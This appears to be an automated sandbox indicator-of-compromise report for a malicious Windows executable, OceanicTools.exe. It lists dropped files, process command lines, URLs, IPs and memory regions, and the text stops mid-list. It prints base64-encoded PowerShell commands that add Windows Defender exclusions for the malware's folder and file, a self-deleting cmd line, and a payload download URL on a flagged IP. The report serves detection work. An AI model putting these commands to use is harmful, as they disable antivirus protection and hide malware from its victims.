IOC Report
OceanicTools.exe

loading gif

Files

File Path
Type
Category
Malicious
OceanicTools.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ydgkqm4.hvm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esdjv2hf.usj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewsbthld.xe1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k43eqanp.ixk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ok5tzepb.rs5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pt45fufj.tj4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhmebzhd.nwh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbogp5v5.2nq.psm1
ASCII text, with no line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\OceanicTools.exe
"C:\Users\user\Desktop\OceanicTools.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
malicious
C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe
"C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
malicious
C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe
"C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
malicious
C:\Windows\System32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\reg.exe
"reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
C:\Windows\System32\wbem\WMIC.exe
"wmic" "computersystem" "get" "manufacturer"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://ns.adobe.c.0/tif
unknown
http://ns.adobe.hotosh
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://gcc.gnu.org/bugs/):
unknown
http://ns.adoraw-sei
unknown
https://duckduckgo.com/ac/?q=
unknown
http://ns.adobe.c.0/ti
unknown
http://ns.photo/
unknown
http://ns.a.0/sTy
unknown
http://ns.adobe.hotoshi
unknown
http://185.208.158.47/phantomtoolsv2.exe
185.208.158.47
http://www.micom/pkiops/Docs/ry.htm0
unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
unknown
http://crl.micro/pki/crl/productCerAut_2010-06-2
unknown
https://contoso.com/License
unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://api.ipify.org/8v
unknown
http://ns.photo/i
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://crl.micft.cMicRosof
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://api.ipify.org/
104.26.13.205
http://nuget.org/NuGet.exe
unknown
http://ns.adoraw-se
unknown
http://ns.a.0/sTyi
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://www.ecosia.org/newtab/
unknown
http://www.micom/pki/certs/Miut_2010-06-23.cr
unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://https:///&?=-_.~:
unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
unknown
http://crl.micro
unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
unknown
http://185.208.158.47/phantomtoolsv2.exeAnalNosorog256X-Secret-Phrase
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://www.haskell.org/ghc/reportabug
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
unknown
https://aka.ms/pscore68
unknown
https://support.mozilla.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 44 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.ipify.org
104.26.13.205

IPs

IP
Domain
Country
Malicious
79.137.202.152
unknown
Russian Federation
malicious
104.26.13.205
api.ipify.org
United States
185.208.158.47
unknown
Switzerland

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash

Memdumps

Base Address
Regiontype
Protect
Malicious
1FB10D28000
heap
page read and write
malicious
26F6D7F8000
heap
page read and write
1FB159F8000
heap
page read and write
7FF6350D1000
unkown
page execute read
1FB13175000
heap
page read and write
1FB10DC8000
heap
page read and write
1FB139B2000
heap
page read and write
1FB1662F000
heap
page read and write
220FAB00000
trusted library allocation
page read and write
1FB12AE0000
remote allocation
page read and write
1FB165C1000
heap
page read and write
1FB13A19000
heap
page read and write
1FB10DCE000
heap
page read and write
220FA0D0000
heap
page readonly
1FB1655F000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
1FB165FA000
heap
page read and write
1FB139B0000
heap
page read and write
861B3F6000
stack
page read and write
1FB12C90000
heap
page read and write
1FB133B2000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB16606000
heap
page read and write
1FB131DD000
heap
page read and write
227C6430000
trusted library allocation
page read and write
1FB150FC000
heap
page read and write
1FB13CA7000
heap
page read and write
1FB139B2000
heap
page read and write
1FB13880000
heap
page read and write
26F6D2A2000
heap
page read and write
2B85D220000
heap
page read and write
26F6D7F8000
heap
page read and write
220F8A30000
heap
page read and write
1FB10D20000
heap
page read and write
1FB12DFA000
heap
page read and write
7FF6351DD000
unkown
page write copy
220815CD000
trusted library allocation
page read and write
1FB12D77000
heap
page read and write
B46C38D000
stack
page read and write
1FB13CDC000
heap
page read and write
1FB159C1000
heap
page read and write
1AA4C6C6000
trusted library allocation
page read and write
7FF6351E1000
unkown
page readonly
1FB13CFD000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB12DAE000
heap
page read and write
1FB139E6000
heap
page read and write
1FB1331A000
heap
page read and write
1FB12DFA000
heap
page read and write
1FB12D79000
heap
page read and write
26F6F172000
heap
page read and write
1FB12C9E000
heap
page read and write
1FB16566000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
1D3FE9C0000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB1526D000
heap
page read and write
1FB1657B000
heap
page read and write
7FF848E0B000
trusted library allocation
page read and write
1FB131BA000
heap
page read and write
220FA160000
trusted library allocation
page read and write
1FB148F1000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1FB154B5000
heap
page read and write
1FB139AA000
heap
page read and write
7FF635370000
unkown
page write copy
7FF849180000
trusted library allocation
page read and write
DB356FE000
stack
page read and write
220FA7A0000
heap
page read and write
1FB12C05000
heap
page read and write
1FB13249000
heap
page read and write
227C6626000
heap
page read and write
220FA6FC000
heap
page read and write
22081108000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
1FB15CC4000
heap
page read and write
26F6D2BC000
heap
page read and write
1FB16948000
heap
page read and write
1FB139C3000
heap
page read and write
1FB152F9000
heap
page read and write
1FB12C71000
heap
page read and write
1AA63A0A000
heap
page read and write
1FB1654B000
heap
page read and write
1AA63A16000
heap
page read and write
861C2CD000
stack
page read and write
1FB10DC1000
heap
page read and write
1FB13FF5000
heap
page read and write
1FB139D2000
heap
page read and write
1FB1532B000
heap
page read and write
7FF849184000
trusted library allocation
page read and write
1FB12E3F000
heap
page read and write
1FB12B18000
heap
page read and write
DB34E93000
stack
page read and write
7FF849110000
trusted library allocation
page read and write
220FA245000
heap
page read and write
7FF849192000
trusted library allocation
page read and write
1FB12BBF000
heap
page read and write
1FB13D78000
heap
page read and write
2209006D000
trusted library allocation
page read and write
1FB153CB000
heap
page read and write
26F6D2B1000
heap
page read and write
7FF7C92E5000
unkown
page readonly
1FB1307B000
heap
page read and write
C1D819D000
stack
page read and write
1FB16973000
heap
page read and write
22080FEA000
trusted library allocation
page read and write
7FF7C91B4000
unkown
page write copy
1FB1681D000
heap
page read and write
1FB153D5000
heap
page read and write
1AA4B4F0000
heap
page execute and read and write
1FB165FF000
heap
page read and write
1FB10D10000
heap
page read and write
1FB13C92000
heap
page read and write
1D3FE750000
heap
page read and write
1FB13998000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB10D96000
heap
page read and write
1FB12CA9000
heap
page read and write
26F6D2AA000
heap
page read and write
1FB133ED000
heap
page read and write
1FB143FD000
heap
page read and write
26F6F184000
heap
page read and write
1FB13CF2000
heap
page read and write
26F6D207000
heap
page read and write
1FB152BB000
heap
page read and write
22080512000
trusted library allocation
page read and write
1FB12D65000
heap
page read and write
1FB1688F000
heap
page read and write
7FF849270000
trusted library allocation
page read and write
1AA6372B000
heap
page read and write
1FB139DC000
heap
page read and write
1FB149E4000
heap
page read and write
1FB1336B000
heap
page read and write
1FB139C3000
heap
page read and write
26F6D7D8000
heap
page read and write
1AA4B4F7000
heap
page execute and read and write
1FB139A4000
heap
page read and write
1FB1699D000
heap
page read and write
1FB139EF000
heap
page read and write
1AA4AF90000
heap
page read and write
1FB159EA000
heap
page read and write
1FB139CD000
heap
page read and write
1FB168AB000
heap
page read and write
26F6D290000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
1FB16623000
heap
page read and write
1FB139EA000
heap
page read and write
220FAA15000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
DB352F9000
stack
page read and write
1FB15393000
heap
page read and write
1FB13988000
heap
page read and write
7FF849273000
trusted library allocation
page read and write
1FB139C9000
heap
page read and write
1FB13D09000
heap
page read and write
1AA4C72C000
trusted library allocation
page read and write
1FB15A8A000
heap
page read and write
1FB1670F000
heap
page read and write
2B85D22D000
heap
page read and write
1FB139E2000
heap
page read and write
1FB139CF000
heap
page read and write
1FB153AB000
heap
page read and write
1FB166C8000
heap
page read and write
861C247000
stack
page read and write
1FB15228000
heap
page read and write
26F6D120000
trusted library allocation
page read and write
26F6D480000
heap
page read and write
1FB139F3000
heap
page read and write
1FB12D70000
heap
page read and write
1FB13695000
heap
page read and write
7EF4BBF6F000
direct allocation
page read and write
1FB168F3000
heap
page read and write
8652DFB000
stack
page read and write
1FB13433000
heap
page read and write
26F6D48E000
heap
page read and write
1FB13D90000
heap
page read and write
227C6330000
heap
page read and write
861C14E000
stack
page read and write
7FF6351DF000
unkown
page write copy
DB3527F000
stack
page read and write
1FB10DCE000
heap
page read and write
1FB13994000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
1FB1400E000
heap
page read and write
1FB13988000
heap
page read and write
1FB139FC000
heap
page read and write
1AA4CBCA000
trusted library allocation
page read and write
2208007F000
trusted library allocation
page read and write
1FB131F4000
heap
page read and write
1FB13C4E000
heap
page read and write
1FB1703A000
heap
page read and write
1FB1689D000
heap
page read and write
26F6D801000
heap
page read and write
1FB12CB6000
heap
page read and write
1FB12DEF000
heap
page read and write
1FB139CD000
heap
page read and write
140000000
remote allocation
page execute and read and write
26F6D2BC000
heap
page read and write
1FB12D65000
heap
page read and write
7FF635374000
unkown
page readonly
1FB12BF7000
heap
page read and write
1FB13252000
heap
page read and write
22080001000
trusted library allocation
page read and write
1FB10DC8000
heap
page read and write
1FB12D1A000
heap
page read and write
1FB13787000
heap
page read and write
26F6D7D0000
heap
page read and write
1FB13401000
heap
page read and write
1FB12D10000
heap
page read and write
1FB139FC000
heap
page read and write
1FB1538B000
heap
page read and write
1FB13333000
heap
page read and write
220FA110000
trusted library allocation
page read and write
1FB10DCE000
heap
page read and write
22090021000
trusted library allocation
page read and write
1FB12C74000
heap
page read and write
1FB16981000
heap
page read and write
1FB13E1C000
heap
page read and write
1FB13D67000
heap
page read and write
1FB1343B000
heap
page read and write
1FB12DE4000
heap
page read and write
26F6F186000
heap
page read and write
1FB152EA000
heap
page read and write
1FB12C9A000
heap
page read and write
1FB13E14000
heap
page read and write
1FB10E1A000
heap
page read and write
1FB143C4000
heap
page read and write
1FB131D9000
heap
page read and write
861B279000
stack
page read and write
7FF848FA1000
trusted library allocation
page read and write
1FB1321D000
heap
page read and write
1FB10E15000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF8491A0000
trusted library allocation
page read and write
7FF849163000
trusted library allocation
page read and write
26F6D226000
heap
page read and write
1FB12C71000
heap
page read and write
1FB139BB000
heap
page read and write
1FB10DF3000
heap
page read and write
2B85D228000
heap
page read and write
1FB13984000
heap
page read and write
1FB15AC4000
heap
page read and write
1FB139A2000
heap
page read and write
1AA636E0000
heap
page read and write
1FB15D0E000
heap
page read and write
1FB15B19000
heap
page read and write
1FB10DC5000
heap
page read and write
1FB13A6D000
heap
page read and write
1FB10DC8000
heap
page read and write
26F6F184000
heap
page read and write
1FB12C9A000
heap
page read and write
7FF84924A000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
1FB10DCE000
heap
page read and write
1FB12D76000
heap
page read and write
1FB13414000
heap
page read and write
1FB15A5C000
heap
page read and write
1FB1335B000
heap
page read and write
1FB14282000
heap
page read and write
1FB13E5E000
heap
page read and write
1FB10E19000
heap
page read and write
1FB12E0B000
heap
page read and write
22080FE8000
trusted library allocation
page read and write
1FB12DCC000
heap
page read and write
1FB139A2000
heap
page read and write
C2591FF000
stack
page read and write
26F6D2B4000
heap
page read and write
C1D8FFD000
stack
page read and write
1FB13FEE000
heap
page read and write
1FB13CDE000
heap
page read and write
1AA4CD39000
trusted library allocation
page read and write
1FB139B2000
heap
page read and write
26F6F170000
heap
page read and write
1FB13375000
heap
page read and write
861B67A000
stack
page read and write
1FB14096000
heap
page read and write
1AA4C6C8000
trusted library allocation
page read and write
1FB139BB000
heap
page read and write
1FB139C3000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
1FB1396B000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
1FB13C5E000
heap
page read and write
1FB15B6E000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB1369A000
heap
page read and write
1FB12D65000
heap
page read and write
1AA63B6E000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
1FB12C00000
heap
page read and write
1FB13BBE000
heap
page read and write
1FB10DF3000
heap
page read and write
DB353F7000
stack
page read and write
1FB10DF3000
heap
page read and write
22080E2E000
trusted library allocation
page read and write
1FB139D4000
heap
page read and write
1FB12C90000
heap
page read and write
1FB12C9B000
heap
page read and write
1AA4963E000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
1AA63A78000
heap
page read and write
1FB12CB0000
heap
page read and write
1FB133C5000
heap
page read and write
22090031000
trusted library allocation
page read and write
1FB139A4000
heap
page read and write
1AA63809000
heap
page read and write
1FB12B48000
heap
page read and write
220F8792000
heap
page read and write
22081CCE000
trusted library allocation
page read and write
1FB12C82000
heap
page read and write
1FB131EB000
heap
page read and write
1FB139C3000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
7FF848FD4000
trusted library allocation
page read and write
1FB15A76000
heap
page read and write
1FB152CB000
heap
page read and write
1FB12E00000
heap
page read and write
1FB12D10000
heap
page read and write
1FB1444C000
heap
page read and write
1FB13233000
heap
page read and write
1FB166E4000
heap
page read and write
1FB159E4000
heap
page read and write
7FF848FD4000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7EF4BDD6F000
direct allocation
page read and write
1FB13BC8000
heap
page read and write
1FB13C66000
heap
page read and write
7FF635370000
unkown
page write copy
DB362CC000
stack
page read and write
1FB13BD2000
heap
page read and write
1FB13AAC000
heap
page read and write
1FB12AE0000
remote allocation
page read and write
1FB10DF3000
heap
page read and write
1FB13FD6000
heap
page read and write
1FB16601000
heap
page read and write
1AA4B6E1000
trusted library allocation
page read and write
7FF849189000
trusted library allocation
page read and write
7EF4BAA00000
direct allocation
page read and write
1FB10E1B000
heap
page read and write
1FB12C71000
heap
page read and write
1FB139A4000
heap
page read and write
1FB139DA000
heap
page read and write
1FB139C3000
heap
page read and write
1FB12CB0000
heap
page read and write
1FB139C3000
heap
page read and write
861B6FE000
stack
page read and write
1AA5B9C7000
trusted library allocation
page read and write
1FB1434C000
heap
page read and write
1FB139A4000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
1FB13A19000
heap
page read and write
1FB13A2E000
heap
page read and write
1FB139FC000
heap
page read and write
1FB134F3000
heap
page read and write
1FB139AA000
heap
page read and write
1FB10FD0000
heap
page read and write
1FB13BB2000
heap
page read and write
1FB15A3B000
heap
page read and write
1FB13A2D000
heap
page read and write
DB3577E000
stack
page read and write
1FB139B6000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
1FB143A5000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1FB152A2000
heap
page read and write
1FB139D3000
heap
page read and write
1FB1527E000
heap
page read and write
220FAA2A000
heap
page read and write
86531FF000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
1FB168E4000
heap
page read and write
26F6D7FE000
heap
page read and write
1AA63AB0000
heap
page read and write
26F6D232000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
1FB139B2000
heap
page read and write
26F6D22A000
heap
page read and write
1FB13A19000
heap
page read and write
26F6D2B1000
heap
page read and write
C25927F000
stack
page read and write
1FB16603000
heap
page read and write
1FB12DED000
heap
page read and write
1FB139AA000
heap
page read and write
1FB15304000
heap
page read and write
1FB13B90000
heap
page read and write
1FB13A19000
heap
page read and write
DB3624F000
stack
page read and write
1FB12D10000
heap
page read and write
26F6D7F8000
heap
page read and write
220FA9EB000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
22081388000
trusted library allocation
page read and write
1FB139FC000
heap
page read and write
26F6D2B0000
heap
page read and write
1FB13D32000
heap
page read and write
1AA4AFD0000
trusted library allocation
page read and write
1FB15283000
heap
page read and write
1FB139A4000
heap
page read and write
1FB13D52000
heap
page read and write
1FB13694000
heap
page read and write
220FA150000
heap
page read and write
1FB12E67000
heap
page read and write
1FB15380000
heap
page read and write
1FB131BB000
heap
page read and write
1AA63B58000
heap
page read and write
1FB139EF000
heap
page read and write
1FB12DF1000
heap
page read and write
1FB139BB000
heap
page read and write
1FB13C9D000
heap
page read and write
7FF7C8721000
unkown
page execute read
1AA4D3AF000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
1FB13D46000
heap
page read and write
220F8A35000
heap
page read and write
1FB139D2000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB143DD000
heap
page read and write
220FA9D7000
heap
page read and write
26F6D48D000
heap
page read and write
1FB139CD000
heap
page read and write
7FF849195000
trusted library allocation
page read and write
1FB13981000
heap
page read and write
1FB15A7E000
heap
page read and write
1FB1599D000
heap
page read and write
1FB13D7C000
heap
page read and write
1FB12DEF000
heap
page read and write
1AA4CA02000
trusted library allocation
page read and write
7FF849229000
trusted library allocation
page read and write
1AA4AFF0000
trusted library allocation
page read and write
7FF7C91B0000
unkown
page write copy
1FB166D6000
heap
page read and write
7FF7C91B6000
unkown
page write copy
1FB12C90000
heap
page read and write
26F6D2BD000
heap
page read and write
1FB1399A000
heap
page read and write
26F6D7ED000
heap
page read and write
26F6D120000
trusted library allocation
page read and write
1FB1523C000
heap
page read and write
1AA495D0000
heap
page read and write
1FB15A9D000
heap
page read and write
7FF849163000
trusted library allocation
page read and write
26F6D19A000
heap
page read and write
1FB13263000
heap
page read and write
1FB139DC000
heap
page read and write
1FB15AAE000
heap
page read and write
1FB13367000
heap
page read and write
220FAA7C000
heap
page read and write
1FB1447D000
heap
page read and write
26F6D252000
heap
page read and write
1FB13680000
heap
page read and write
220F8797000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
1FB168BA000
heap
page read and write
861ADFE000
stack
page read and write
1FB12DF4000
heap
page read and write
1FB139E4000
heap
page read and write
1FB15276000
heap
page read and write
1FB10E19000
heap
page read and write
1FB10E1B000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
26F6D1D0000
heap
page read and write
1FB139CD000
heap
page read and write
DB3644D000
stack
page read and write
220FA955000
heap
page read and write
1FB12E20000
heap
page read and write
1FB13E13000
heap
page read and write
1FB139DA000
heap
page read and write
1FB13282000
heap
page read and write
1FB10E1B000
heap
page read and write
1FB139DA000
heap
page read and write
26F6D7E3000
heap
page read and write
1FB16598000
heap
page read and write
1FB13A04000
heap
page read and write
1FB12E02000
heap
page read and write
7FF848FA1000
trusted library allocation
page read and write
1FB12CA2000
heap
page read and write
1FB1399B000
heap
page read and write
1FB152B5000
heap
page read and write
22081355000
trusted library allocation
page read and write
1FB1428C000
heap
page read and write
1FB15ACE000
heap
page read and write
220F8705000
heap
page read and write
22080DB9000
trusted library allocation
page read and write
1FB13386000
heap
page read and write
220F8799000
heap
page read and write
26F6D252000
heap
page read and write
1FB139E3000
heap
page read and write
1FB139A4000
heap
page read and write
1FB10EF0000
heap
page read and write
7FF6350D1000
unkown
page execute read
1FB13A19000
heap
page read and write
1FB13CB2000
heap
page read and write
2B85D1A0000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB12DE6000
heap
page read and write
1FB165BF000
heap
page read and write
1FB1548B000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB139D2000
heap
page read and write
1FB12D1A000
heap
page read and write
26F6D7E1000
heap
page read and write
1FB15A64000
heap
page read and write
1FB139A5000
heap
page read and write
26F6D207000
heap
page read and write
1FB13268000
heap
page read and write
1FB16756000
heap
page read and write
1FB12E08000
heap
page read and write
1FB139F9000
heap
page read and write
1FB13B8F000
heap
page read and write
1FB1396C000
heap
page read and write
1D3FE870000
heap
page read and write
1FB13349000
heap
page read and write
DB34F9E000
stack
page read and write
1FB169BA000
heap
page read and write
DB34FDE000
stack
page read and write
1FB14ADA000
heap
page read and write
1FB13CF8000
heap
page read and write
1FB139AA000
heap
page read and write
220815F4000
trusted library allocation
page read and write
1FB12CE0000
heap
page read and write
1FB12DAE000
heap
page read and write
7EF4BA000000
direct allocation
page read and write
1FB13D5E000
heap
page read and write
1FB1678E000
heap
page read and write
1FB1338E000
heap
page read and write
1FB139A4000
heap
page read and write
7EF4BC96F000
direct allocation
page read and write
1FB12D1A000
heap
page read and write
F71BCFE000
unkown
page read and write
26F6D2A9000
heap
page read and write
7EF4BE76F000
direct allocation
page read and write
861B379000
stack
page read and write
1FB139EB000
heap
page read and write
1FB13C67000
heap
page read and write
1FB13DBE000
heap
page read and write
1FB139C0000
heap
page read and write
26F6D19E000
heap
page read and write
1FB139BB000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB1307A000
heap
page read and write
1FB161CE000
heap
page read and write
1FB169AB000
heap
page read and write
26F6D2B2000
heap
page read and write
1FB13A2E000
heap
page read and write
1FB152F6000
heap
page read and write
7FF635374000
unkown
page readonly
1FB12CB0000
heap
page read and write
1FB10DF3000
heap
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
26F6D19E000
heap
page read and write
26F6F17D000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
220FA766000
heap
page read and write
1FB139CD000
heap
page read and write
1AA6377F000
heap
page read and write
1FB1318B000
heap
page read and write
1FB139A4000
heap
page read and write
26F6D207000
heap
page read and write
7FF6351E1000
unkown
page readonly
1FB10DCE000
heap
page read and write
220FA8E0000
heap
page read and write
1FB139DA000
heap
page read and write
F71BDFF000
stack
page read and write
1FB166B9000
heap
page read and write
1FB12B10000
heap
page read and write
1FB133E4000
heap
page read and write
1FB12E1F000
heap
page read and write
7FF848FD8000
trusted library allocation
page read and write
1FB1655D000
heap
page read and write
1FB139BB000
heap
page read and write
1FB12CBA000
heap
page read and write
1FB13681000
heap
page read and write
1FB1396B000
heap
page read and write
1FB13409000
heap
page read and write
1FB159FE000
heap
page read and write
1FB152D4000
heap
page read and write
26F6D25B000
heap
page read and write
1FB12C8E000
heap
page read and write
1FB154A0000
heap
page read and write
26F6D2A2000
heap
page read and write
1AA4965E000
heap
page read and write
1FB139A0000
heap
page read and write
26F6D2BA000
heap
page read and write
C1D8EFE000
stack
page read and write
26F6D805000
heap
page read and write
1FB12BF0000
heap
page read and write
1FB13354000
heap
page read and write
1FB139CD000
heap
page read and write
1FB153A0000
heap
page read and write
7FF7C91BD000
unkown
page write copy
1FB12E26000
heap
page read and write
1FB13D5A000
heap
page read and write
1FB13DC8000
heap
page read and write
1FB148F0000
heap
page read and write
1FB131CF000
heap
page read and write
C1D94FC000
stack
page read and write
1FB131C8000
heap
page read and write
1AA4964A000
heap
page read and write
1FB139C3000
heap
page read and write
220FA727000
heap
page read and write
1FB13C35000
heap
page read and write
1FB167BA000
heap
page read and write
26F6D7D7000
heap
page read and write
1FB159F4000
heap
page read and write
22081CD2000
trusted library allocation
page read and write
1FB139AA000
heap
page read and write
7FF849240000
trusted library allocation
page read and write
1FB12CFF000
heap
page read and write
220FA960000
heap
page read and write
1FB10DC8000
heap
page read and write
1FB13B9D000
heap
page read and write
1FB12E04000
heap
page read and write
1FB13A92000
heap
page read and write
26F6D7DC000
heap
page read and write
1FB139CD000
heap
page read and write
1FB13329000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1AA4CA35000
trusted library allocation
page read and write
26F6D2B1000
heap
page read and write
1FB12C79000
heap
page read and write
1FB131D6000
heap
page read and write
1FB13429000
heap
page read and write
1FB13D35000
heap
page read and write
1AA49646000
heap
page read and write
7DF4EB510000
trusted library allocation
page execute and read and write
1FB1658B000
heap
page read and write
26F6D7ED000
heap
page read and write
2208116C000
trusted library allocation
page read and write
7FF849260000
trusted library allocation
page read and write
1FB16654000
heap
page read and write
1FB10E1B000
heap
page read and write
1FB13A45000
heap
page read and write
7EF4B9600000
direct allocation
page read and write
1FB1529F000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
1FB16592000
heap
page read and write
1FB12CF8000
heap
page read and write
1FB16628000
heap
page read and write
1FB13D6B000
heap
page read and write
1AA4C7BB000
trusted library allocation
page read and write
1AA5B9DA000
trusted library allocation
page read and write
1FB168C8000
heap
page read and write
1FB139A2000
heap
page read and write
1FB13D4E000
heap
page read and write
1AA5B9E4000
trusted library allocation
page read and write
1FB139B2000
heap
page read and write
1FB13981000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
1FB1442C000
heap
page read and write
7FF7C9286000
unkown
page write copy
B46C67F000
stack
page read and write
7DF4EB500000
trusted library allocation
page execute and read and write
1FB13220000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
1FB139EA000
